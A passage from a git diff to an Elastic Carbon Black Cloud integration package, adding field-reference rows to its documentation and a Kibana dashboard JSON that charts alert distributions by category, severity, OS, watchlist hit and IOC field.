process.parent.executable | Absolute path to the process executable. | keyword | +| process.parent.executable.text | Multi-field of `process.parent.executable`. | match_only_text | +| process.parent.hash.md5 | MD5 hash. | keyword | +| process.parent.hash.sha256 | SHA256 hash. | keyword | +| process.parent.name | Process name. Sometimes called program name or similar. | keyword | +| process.parent.name.text | Multi-field of `process.parent.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.pid | Process id. | long | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + + ### Endpoint Event This is the `endpoint_event` dataset. @@ -536,6 +975,7 @@ An example event for `endpoint_event` looks as following: | carbon_black_cloud.endpoint_event.childproc.publisher.state | The state of the publisher. | keyword | | carbon_black_cloud.endpoint_event.childproc.reputation | Carbon Black Cloud Reputation string for the childproc. | keyword | | carbon_black_cloud.endpoint_event.childproc.username | The username associated with the user context that the child process was started under. | keyword | +| carbon_black_cloud.endpoint_event.create_time | The time at which the event was ingested in carbon black cloud. | keyword | | carbon_black_cloud.endpoint_event.crossproc.action | The action taken on cross-process. | keyword | | carbon_black_cloud.endpoint_event.crossproc.api | Name of the operating system API called by the actor process. | keyword | | carbon_black_cloud.endpoint_event.crossproc.guid | Unique ID of the cross process. | keyword | @@ -600,6 +1040,8 @@ An example event for `endpoint_event` looks as following: | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | | dll.hash.md5 | MD5 hash. | keyword | | dll.hash.sha256 | SHA256 hash. | keyword | | dll.path | Full file path of the library. | keyword | @@ -815,6 +1257,8 @@ An example event for `watchlist_hit` looks as following: | carbon_black_cloud.watchlist_hit.process.parent.publisher.state | The state of the publisher. | keyword | | carbon_black_cloud.watchlist_hit.process.parent.reputation | Reputation of the actor process; applied when event is processed by the Carbon Black Cloud i.e. after sensor delivers event to the cloud. | keyword | | carbon_black_cloud.watchlist_hit.process.parent.username | The username associated with the user context that this process was started under. | keyword | +| carbon_black_cloud.watchlist_hit.process.publisher.name | The name of the publisher. | keyword | +| carbon_black_cloud.watchlist_hit.process.publisher.state | The state of the publisher. | keyword | | carbon_black_cloud.watchlist_hit.process.reputation | Reputation of the actor process; applied when event is processed by the Carbon Black Cloud i.e. after sensor delivers event to the cloud. | keyword | | carbon_black_cloud.watchlist_hit.process.username | The username associated with the user context that this process was started under. | keyword | | carbon_black_cloud.watchlist_hit.report.id | ID of the watchlist report(s) that detected a hit on the process. | keyword | @@ -968,7 +1412,6 @@ An example event for `asset_vulnerability_summary` looks as following: "severity": "CRITICAL" } } - ``` **Exported fields** diff --git a/packages/carbon_black_cloud/kibana/dashboard/carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de.json b/packages/carbon_black_cloud/kibana/dashboard/carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de.json new file mode 100644 index 00000000000..3afa5e2fb50 --- /dev/null +++ b/packages/carbon_black_cloud/kibana/dashboard/carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de.json @@ -0,0 +1,2284 @@ +{ + "attributes": { + "description": "This dashboard shows alert v7 logs collected by the Carbon Black Cloud integration.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "carbon_black_cloud.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "carbon_black_cloud.alert_v7" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-3a59266a-6775-483f-99a4-806d42c20187", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "3a59266a-6775-483f-99a4-806d42c20187": { + "columnOrder": [ + "79bce1a2-29ed-420e-8688-ed757ffe9cde", + "23c359ea-ee4d-4afe-a765-7c2ee5eafca5" + ], + "columns": { + "23c359ea-ee4d-4afe-a765-7c2ee5eafca5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "79bce1a2-29ed-420e-8688-ed757ffe9cde": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Category", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "23c359ea-ee4d-4afe-a765-7c2ee5eafca5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.category" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "79bce1a2-29ed-420e-8688-ed757ffe9cde" + ], + "layerId": "3a59266a-6775-483f-99a4-806d42c20187", + "layerType": "data", + "legendDisplay": "default", + "metric": "23c359ea-ee4d-4afe-a765-7c2ee5eafca5", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad", + "w": 17, + "x": 0, + "y": 0 + }, + "panelIndex": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad", + "title": "Distribution of Alerts by Category [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5d228926-1588-4273-83fb-e1e030db620d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5d228926-1588-4273-83fb-e1e030db620d": { + "columnOrder": [ + "c9a9a7ec-ae0f-4cc2-88b6-cf78a3b9c6da", + "e485f3cc-7c94-4ef8-9886-fdb85e5655e7" + ], + "columns": { + "c9a9a7ec-ae0f-4cc2-88b6-cf78a3b9c6da": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Alert Type", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "e485f3cc-7c94-4ef8-9886-fdb85e5655e7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.type" + }, + "e485f3cc-7c94-4ef8-9886-fdb85e5655e7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "c9a9a7ec-ae0f-4cc2-88b6-cf78a3b9c6da" + ], + "layerId": "5d228926-1588-4273-83fb-e1e030db620d", + "layerType": "data", + "legendDisplay": "default", + "legendPosition": "right", + "metric": "e485f3cc-7c94-4ef8-9886-fdb85e5655e7", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3", + "w": 16, + "x": 17, + "y": 0 + }, + "panelIndex": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3", + "title": "Distribution of Alerts by Alert Type [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4860b265-1a18-4665-bfa6-d5b45d2b4698", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "4860b265-1a18-4665-bfa6-d5b45d2b4698": { + "columnOrder": [ + "115ca755-f7fb-4f28-8163-e4ae35441458", + "ca0cb05e-bc44-46c4-94bc-70691765a3ea" + ], + "columns": { + "115ca755-f7fb-4f28-8163-e4ae35441458": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device Target Value", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ca0cb05e-bc44-46c4-94bc-70691765a3ea", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.device.target_value" + }, + "ca0cb05e-bc44-46c4-94bc-70691765a3ea": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "115ca755-f7fb-4f28-8163-e4ae35441458" + ], + "layerId": "4860b265-1a18-4665-bfa6-d5b45d2b4698", + "layerType": "data", + "legendDisplay": "default", + "metric": "ca0cb05e-bc44-46c4-94bc-70691765a3ea", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "7428974e-7e40-44ed-ae98-d5f70484cc74", + "w": 15, + "x": 33, + "y": 0 + }, + "panelIndex": "7428974e-7e40-44ed-ae98-d5f70484cc74", + "title": "Distribution of Alerts by Device Target Value [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9df0b783-d395-42ed-91d4-245d42a3ce75", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "9df0b783-d395-42ed-91d4-245d42a3ce75": { + "columnOrder": [ + "efded0e8-6180-4e56-96ef-5c1411d227c0", + "2a0913e6-8139-4915-a0b1-c531f4a2d79b" + ], + "columns": { + "2a0913e6-8139-4915-a0b1-c531f4a2d79b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "efded0e8-6180-4e56-96ef-5c1411d227c0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Sensor Action", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2a0913e6-8139-4915-a0b1-c531f4a2d79b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.sensor_action" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2a0913e6-8139-4915-a0b1-c531f4a2d79b" + ], + "layerId": "9df0b783-d395-42ed-91d4-245d42a3ce75", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "efded0e8-6180-4e56-96ef-5c1411d227c0" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "68904d73-a00c-4e08-9bfb-521ae79562db", + "w": 24, + "x": 0, + "y": 15 + }, + "panelIndex": "68904d73-a00c-4e08-9bfb-521ae79562db", + "title": "Distribution of Alerts by Sensor Action [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dec17f01-e97d-46b5-9a93-68a8160b77fc", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "dec17f01-e97d-46b5-9a93-68a8160b77fc": { + "columnOrder": [ + "98e5bff9-a563-4a35-8af2-5a8081b85e47", + "c99e3a9a-a964-4239-92bd-ecdae12b4622" + ], + "columns": { + "98e5bff9-a563-4a35-8af2-5a8081b85e47": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Reputation", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "c99e3a9a-a964-4239-92bd-ecdae12b4622", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.process.reputation" + }, + "c99e3a9a-a964-4239-92bd-ecdae12b4622": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "c99e3a9a-a964-4239-92bd-ecdae12b4622" + ], + "layerId": "dec17f01-e97d-46b5-9a93-68a8160b77fc", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "98e5bff9-a563-4a35-8af2-5a8081b85e47" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a8013a95-c2ed-45fa-a431-ab322e09732c", + "w": 24, + "x": 24, + "y": 30 + }, + "panelIndex": "a8013a95-c2ed-45fa-a431-ab322e09732c", + "title": "Distribution of Alerts by Process Reputation [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c0723707-2be7-4bf2-9464-b3224ff13091", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "c0723707-2be7-4bf2-9464-b3224ff13091": { + "columnOrder": [ + "c93f85fc-58fe-4998-827c-e8dbb3dc2258", + "16541012-3218-4763-b15e-cb4785ced3aa" + ], + "columns": { + "16541012-3218-4763-b15e-cb4785ced3aa": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "c93f85fc-58fe-4998-827c-e8dbb3dc2258": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Severity", + "operationType": "range", + "params": { + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" + }, + "scale": "interval", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "c93f85fc-58fe-4998-827c-e8dbb3dc2258" + ], + "layerId": "c0723707-2be7-4bf2-9464-b3224ff13091", + "layerType": "data", + "legendDisplay": "default", + "metric": "16541012-3218-4763-b15e-cb4785ced3aa", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae", + "w": 24, + "x": 24, + "y": 15 + }, + "panelIndex": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae", + "title": "Distribution of Alerts by Severity [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5d41bec8-a673-495e-9c69-de61f95d6e2e", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5d41bec8-a673-495e-9c69-de61f95d6e2e": { + "columnOrder": [ + "39ad8495-e3d0-4ada-9fbb-f8d083d3210c", + "c7dd51f0-84bd-47dc-8305-0bfb4cef9710", + "4126abe1-b198-4465-89f8-57922eb6f60e" + ], + "columns": { + "39ad8495-e3d0-4ada-9fbb-f8d083d3210c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "OS", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4126abe1-b198-4465-89f8-57922eb6f60e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.os.type" + }, + "4126abe1-b198-4465-89f8-57922eb6f60e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "c7dd51f0-84bd-47dc-8305-0bfb4cef9710": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "OS Version", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4126abe1-b198-4465-89f8-57922eb6f60e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.os.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "39ad8495-e3d0-4ada-9fbb-f8d083d3210c", + "c7dd51f0-84bd-47dc-8305-0bfb4cef9710" + ], + "layerId": "5d41bec8-a673-495e-9c69-de61f95d6e2e", + "layerType": "data", + "legendDisplay": "default", + "metric": "4126abe1-b198-4465-89f8-57922eb6f60e", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "62a0100e-29b4-4859-b753-61348d6f929a", + "w": 24, + "x": 0, + "y": 30 + }, + "panelIndex": "62a0100e-29b4-4859-b753-61348d6f929a", + "title": "Distribution of Alerts by OS, OS version [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2e00b48b-7d5b-469f-9613-3503131f7a3f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "2e00b48b-7d5b-469f-9613-3503131f7a3f": { + "columnOrder": [ + "4b7a5cce-e4a9-4cac-b81d-a140d25fe60a", + "3ef96a91-1826-43b7-b4a7-47acf52b1cf0" + ], + "columns": { + "3ef96a91-1826-43b7-b4a7-47acf52b1cf0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "4b7a5cce-e4a9-4cac-b81d-a140d25fe60a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Run State", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3ef96a91-1826-43b7-b4a7-47acf52b1cf0", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.run_state" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "4b7a5cce-e4a9-4cac-b81d-a140d25fe60a" + ], + "layerId": "2e00b48b-7d5b-469f-9613-3503131f7a3f", + "layerType": "data", + "legendDisplay": "default", + "metric": "3ef96a91-1826-43b7-b4a7-47acf52b1cf0", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb", + "w": 24, + "x": 24, + "y": 75 + }, + "panelIndex": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb", + "title": "Distribution of Alerts by Run State [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fc3bcaa9-a33b-44c4-8d08-5643bf9665ae", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "fc3bcaa9-a33b-44c4-8d08-5643bf9665ae": { + "columnOrder": [ + "15936f2f-ec61-4701-90cd-8155470c607f", + "d6153110-e0a6-4c04-b50d-c7b37629079a" + ], + "columns": { + "15936f2f-ec61-4701-90cd-8155470c607f": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device Policy Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d6153110-e0a6-4c04-b50d-c7b37629079a", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.device.policy" + }, + "d6153110-e0a6-4c04-b50d-c7b37629079a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "15936f2f-ec61-4701-90cd-8155470c607f", + "isTransposed": false + }, + { + "columnId": "d6153110-e0a6-4c04-b50d-c7b37629079a", + "isTransposed": false + } + ], + "layerId": "fc3bcaa9-a33b-44c4-8d08-5643bf9665ae", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0", + "w": 24, + "x": 24, + "y": 90 + }, + "panelIndex": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0", + "title": "Top 10 Device Policy Names [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2d5596cc-8954-4cf3-b056-235b6aa9efa8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "2d5596cc-8954-4cf3-b056-235b6aa9efa8": { + "columnOrder": [ + "6d4ed73e-d5ee-46d1-b6c1-27f13184569f", + "e30488e7-8423-4a65-bcb7-dd2f99b7eee4" + ], + "columns": { + "6d4ed73e-d5ee-46d1-b6c1-27f13184569f": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Watchlist Hit", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "e30488e7-8423-4a65-bcb7-dd2f99b7eee4", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.watchlists.name" + }, + "e30488e7-8423-4a65-bcb7-dd2f99b7eee4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "e30488e7-8423-4a65-bcb7-dd2f99b7eee4" + ], + "layerId": "2d5596cc-8954-4cf3-b056-235b6aa9efa8", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "6d4ed73e-d5ee-46d1-b6c1-27f13184569f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "68b6d1b6-b955-4b8e-8649-98404fc4e871", + "w": 24, + "x": 0, + "y": 75 + }, + "panelIndex": "68b6d1b6-b955-4b8e-8649-98404fc4e871", + "title": "Distribution of Alerts by Watchlist Hit [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08b18428-bc7f-4e09-8277-56b698796abf", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "08b18428-bc7f-4e09-8277-56b698796abf": { + "columnOrder": [ + "1a9eb0d1-f838-4c0d-b8c6-aafeec300d04", + "eaca1473-4252-4094-ac92-d11f9c59feeb" + ], + "columns": { + "1a9eb0d1-f838-4c0d-b8c6-aafeec300d04": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "IOC Field", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "eaca1473-4252-4094-ac92-d11f9c59feeb", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.ioc.field" + }, + "eaca1473-4252-4094-ac92-d11f9c59feeb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "eaca1473-4252-4094-ac92-d11f9c59feeb" + ], + "layerId": "08b18428-bc7f-4e09-8277-56b698796abf", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "1a9eb0d1-f838-4c0d-b8c6-aafeec300d04" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd", + "w": 24, + "x": 24, + "y": 105 + }, + "panelIndex": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd", + "title": "Distribution of Alerts by IOC field [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c595f8ee-2027-4013-9e5f-8761f03a0e50", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + 